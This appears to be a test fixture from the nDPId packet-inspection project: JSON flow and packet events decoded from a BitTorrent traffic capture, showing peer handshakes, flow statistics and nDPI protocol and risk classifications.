00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1455469978662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978662,"pkt":"xCwDBkn+LFbcjDU0CABFAACrdTRAAHcGzXJf6p8QwKgBA6D1zrlkqPSW1A6dPYAYAMM1JwAAAQEICgIQtLMZ3BteE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wos5cW3r846cWQCoAAADoFABkMTplaTBlNDppcHY0NDpf6p8QMTI6Y29tcGxldGVfYWdvaTQ1ZTE6bWQxMTo="}
01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1455469978678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1455469978678,"pkt":"xCwDBkn+LFbcjDU0CABFAAI9dTZAAHcGy95f6p8QwKgBA6D1zrlkqPUN1A6dPYAZAMPqbAAAAQEICgIQtLMZ3BtedXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTQxMjA1ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyMWU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/7\/\/\/\/\/\/\/\/\/f\/\/\/\/9\/\/\/\/3\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/7\/\/3\/f\/\/\/\/\/r\/\/\/v\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/3\/7\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/9\/\/f\/4AAAAAFBAAAACUAAAAFBAAAAJwAAAAFBAAAArkAAAAFBAAAAfAAAAAFBAAAA3QAAAAFBAAAAosAAAAFBAAAAZ8AAAAFBAAAAdUAAAAFBAAAAqwAAAAFBAAAAhUAAAAFBAAAAM0AAAAFBAAAAk4AAAAFBAAAAIAAAAAFBAAAA4IAAAAFBAAAAF4AAAAFBAAAAi0AAAAFBAAAAVYAAAAFBAAAAZcAAAAFBAAAA1AAAAAFBAAAAeYAAAAFBAAAAa8AAAAFBAAAAhcAAAAFBAAAAw0AAAAFBAAAARs="}
01298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469978679,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8IwBAAHYG\/QBf7cEiwKgBAyw5zrr6gfxfv4GyU4AZAQJxbQAAAQEICgADmIEZ3BtmcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpMTEzMjFlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTIyZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/+\/\/7\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/v\/\/v\/\/+P\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/+\/7\/7\/\/\/\/\/\/7\/\/\/\/\/\/v\/\/3+\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/7\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/3\/\/gAAAAAUEAAACNQAAAAUEAAACYwAAAAUEAAADgAAAAAUEAAAB1wAAAAUEAAAAyQAAAAUEAAABzQAAAAUEAAACUQAAAAUEAAABYQAAAAUEAAACzQAAAAUEAAAApQAAAAUEAAACtgAAAAUEAAACSAAAAAUEAAACDQAAAAUEAAABIQAAAAUEAAABYwAAAAUEAAAC5wAAAAUEAAAAlQAAAAUEAAABYgAAAAUEAAABlQAAAAUEAAADQQAAAAUEAAAB4wAAAAUEAAABOQAAAAUEAAABSwAAAAUEAAAAfQ=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980213,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4U25AAEAGAADAqAEDU9i48c6\/yNUzq1kTBM6UFIAYL5vO3wAAAQEIChncIiN4G2eaE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjq+Lj4Q+qUQM4PY="}
00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980262,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4esFAAEAGAADAqAEDXUH5ZM6+emiQl\/fDL3XicoAYTYMYvAAAAQEIChncIlIAH\/RSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkTA1ljAvA+q8j0="}
00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980275,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4g5FAAEAGAADAqAEDXUHjZM69Sqzdpe7S802+OYAYVXMCvAAAAQEIChncIl4AhA2FE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkhEgSgYOOKqPw="}
00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1455469980297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469980297,"pkt":"xCwDBkn+LFbcjDU0CABFYACEPABAADIGPZ9T2LjxwKgBA8jVzr8EzpQUM6tZV4AYECksHwAAAQEICngbZ84Z3CIjE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qnlHDgsE5LNSCYRoAAAEAFABkMTplaTA="}
01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1455469980371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469980371,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ8C7pAADIGa+1T2LjxwKgBA8jVzr8EzpRkM6tZV4AYECkszQAAAQEICngbaAwZ3CJzZTQ6aXB2NDQ6U9i48TQ6aXB2NjE2Ov6AAAAAAAAA6gaI\/\/7N9BMxMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUxNDEzZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDEuOC44Mjp5cGk1MjkyN2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/v\/\/\/\/\/\/\/\/9\/f\/+\/\/9\/\/\/f\/\/\/\/\/\/\/73v\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/7\/\/3\/9v\/\/\/9+\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/+\/\/\/\/7\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAiQAAAAFBAAAAQwAAAAFBAAAAisAAAAFBAAAArIAAAAFBAAAAFgAAAAFBAAAAxMAAAAFBAAAAgYAAAAFBAAAAfgAAAAFBAAAAvcAAAAFBAAAAm0AAAAFBAAAAMYAAAAFBAAAA0sAAAAFBAAAAXAAAAAFBAAAAMEAAAAFBAAAAecAAAAFBAAAABcAAAAFBAAAAI4AAAAFBAAAAHoAAAAFBAAAAgkAAAAFBAAAAMsAAAAFBAAAAGkAAAAFBAAAARwAAAAFBAAAAdQAAAAFBAAAAFA="}
00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1455469980390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1455469980390,"pkt":"xCwDBkn+LFbcjDU0CABFAACocqBAAHMGfF5dQflkwKgBA3pozr4vdeJykJf4B4AYAMOuCwAAAQEICgAf9F4Z3CJSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogL0Pl3FbMgdQMAAAAEAFABkMTplaTBlNDppcHY0NDpdQflkNDppcHY2MTY6IAEAAF71ef0Mhifaor4="}
01334{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1455469980488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1455469980488,"pkt":"xCwDBkn+LFbcjDU0CABFAAJYcqJAAHMGeqxdQflkwKgBA3pozr4vdeLmkJf4B4AZAMO1LAAAAQEICgAf9F8Z3CJSBpsxMjpjb21wbGV0ZV9hZ29pMmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTMxMzM2ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyNmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/99\/\/\/\/\/\/9\/\/+\/\/\/\/\/\/\/\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/v\/\/\/\/\/9\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/36\/\/\/\/\/93\/\/\/\/\/\/\/\/\/\/\/\/\/fv\/\/\/9P\/\/3\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAm0AAAAFBAAAApQAAAAFBAAAAI0AAAAFBAAAA0AAAAAFBAAAASAAAAAFBAAAAwgAAAAFBAAAAHoAAAAFBAAAAV0AAAAFBAAAAfQAAAAFBAAAAwsAAAAFBAAAAmsAAAAFBAAAAhwAAAAFBAAAAuYAAAAFBAAAAmQAAAAFBAAAApAAAAAFBAAAAFAAAAAFBAAAAc0AAAAFBAAAAa0AAAAFBAAAAx4AAAAFBAAAANIAAAAFBAAAAu0AAAAFBAAAAwoAAAAFBAAAAEoAAAAFBAAAAME="}
00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00839{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7440000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7440000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7440000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
